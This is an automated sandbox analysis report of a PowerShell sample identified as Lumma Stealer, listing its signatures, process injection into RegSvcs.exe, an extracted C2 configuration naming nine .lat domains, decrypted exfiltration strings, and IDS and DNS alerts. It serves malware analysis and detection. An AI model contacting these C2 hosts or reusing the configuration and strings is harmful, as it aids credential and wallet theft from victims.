Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
92.255.57_1.112.ps1

Overview

General Information

Sample name:92.255.57_1.112.ps1
Analysis ID:1591629
MD5:123f90955530fdab49599f6bb8d40980
SHA1:e0f3a15f086a3daab49242376dcd5c76a3888d20
SHA256:b404ee84e4b5100561bc108c58aedc06cae277cd220067dce59a3c1cc93a3ac1
Tags:92-255-57-112bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

LummaC
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 2960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 2828 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["shoefeatthe.lat", "washyceehsu.lat", "leggelatez.lat", "miniatureyu.lat", "kickykiduz.lat", "curtainykeo.lat", "finickypwk.lat", "savorraiykj.lat", "bloodyswif.lat"], "Build id": "atxOT1--traff12"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", ProcessId: 6012, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", ProcessId: 6012, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.904199+010020283713Unknown Traffic192.168.2.649710104.102.49.254443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.148193+010020591891Domain Observed Used for C2 Detected192.168.2.6644061.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.117197+010020592211Domain Observed Used for C2 Detected192.168.2.6566701.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.238963+010020591911Domain Observed Used for C2 Detected192.168.2.6576921.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.207515+010020591991Domain Observed Used for C2 Detected192.168.2.6644371.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.176897+010020592011Domain Observed Used for C2 Detected192.168.2.6543161.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.197153+010020592031Domain Observed Used for C2 Detected192.168.2.6495521.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.217892+010020592071Domain Observed Used for C2 Detected192.168.2.6522131.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.228308+010020592091Domain Observed Used for C2 Detected192.168.2.6499671.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:11.165181+010020592111Domain Observed Used for C2 Detected192.168.2.6635121.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T08:24:12.397348+010028586661Domain Observed Used for C2 Detected192.168.2.649710104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://kickykiduz.lat:443/apiAvira URL Cloud: Label: malware
    Source: https://washyceehsu.lat:443/apiAvira URL Cloud: Label: malware
    Source: https://finickypwk.lat:443/apiAvira URL Cloud: Label: malware
    Source: https://shoefeatthe.lat:443/apiAvira URL Cloud: Label: malware
    Source: curtainykeo.latAvira URL Cloud: Label: malware
    Source: https://savorraiykj.lat:443/apisqAvira URL Cloud: Label: malware
    Source: 4.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["shoefeatthe.lat", "washyceehsu.lat", "leggelatez.lat", "miniatureyu.lat", "kickykiduz.lat", "curtainykeo.lat", "finickypwk.lat", "savorraiykj.lat", "bloodyswif.lat"], "Build id": "atxOT1--traff12"}
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: finickypwk.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shoefeatthe.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: savorraiykj.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: kickykiduz.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: miniatureyu.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: leggelatez.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: washyceehsu.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bloodyswif.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curtainykeo.lat
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: atxOT1--traff12
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2208766301.000001B544DE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2184375332.000001B52DC85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2184375332.000001B52CCD8000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx4_2_00408740
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl4_2_0042E002
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl4_2_0042E002
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax4_2_004161DF
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]4_2_004251E8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]4_2_004082A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push eax4_2_00440310
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, dword ptr [00448B08h]4_2_004273A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]4_2_004273A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [esp+50h]4_2_004273A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]4_2_00417451
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]4_2_00407400
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]4_2_00407400
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h4_2_0043C410
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push esi4_2_0043C410
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042D420
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_0042B430
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]4_2_0042E5C2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax4_2_004165EE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]4_2_00415590
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx4_2_004095A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]4_2_0041F710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]4_2_0041F710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh4_2_004427E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042E7EB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042F799
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h4_2_00429871
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax4_2_0042A810
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp eax4_2_004288BA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [edx]4_2_00402940
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]4_2_0040A910
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]4_2_00427A50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push dword ptr [esp+28h]4_2_00426A00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]4_2_0040BA29
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00438AF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [ebx], cx4_2_0041AA90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [esi], cx4_2_0041AA90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push 00000000h4_2_0040CB44
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]4_2_0043EB00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax4_2_00420B10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]4_2_0041DC40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h4_2_00415C25
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add ebp, edi4_2_00408CD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edi], cx4_2_00426D70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], cl4_2_0042DD30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax4_2_00415E42
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00423E44
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h4_2_00413E50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h4_2_0040DE72
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+79h]4_2_00425E00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]4_2_00425E00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h4_2_0043EE10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_00408EB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]4_2_0041DEB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h4_2_0040DFEA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042DFAF

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2059221 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat) : 192.168.2.6:56670 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.6:64406 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.6:54316 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.6:57692 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.6:49552 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.6:52213 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.6:64437 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.6:63512 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.6:49967 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49710 -> 104.102.49.254:443
    Source: Malware configuration extractorURLs: shoefeatthe.lat
    Source: Malware configuration extractorURLs: washyceehsu.lat
    Source: Malware configuration extractorURLs: leggelatez.lat
    Source: Malware configuration extractorURLs: miniatureyu.lat
    Source: Malware configuration extractorURLs: kickykiduz.lat
    Source: Malware configuration extractorURLs: curtainykeo.lat
    Source: Malware configuration extractorURLs: finickypwk.lat
    Source: Malware configuration extractorURLs: savorraiykj.lat
    Source: Malware configuration extractorURLs: bloodyswif.lat
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.102.49.254:443
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: RegSvcs.exe, 00000004.00000002.2196147151.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ h equals www.youtube.com (Youtube)
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=6315fec7fd7f6a857a9a686b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 15 Jan 2025 07:24:12 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: curtainykeo.lat
    Source: global trafficDNS traffic detected: DNS query: bloodyswif.lat
    Source: global trafficDNS traffic detected: DNS query: washyceehsu.lat
    Source: global trafficDNS traffic detected: DNS query: leggelatez.lat
    Source: global trafficDNS traffic detected: DNS query: miniatureyu.lat
    Source: global trafficDNS traffic detected: DNS query: kickykiduz.lat
    Source: global trafficDNS traffic detected: DNS query: savorraiykj.lat
    Source: global trafficDNS traffic detected: DNS query: shoefeatthe.lat
    Source: global trafficDNS traffic detected: DNS query: finickypwk.lat
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: powershell.exe, 00000000.00000002.2208119243.000001B544BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52CCD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52CAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
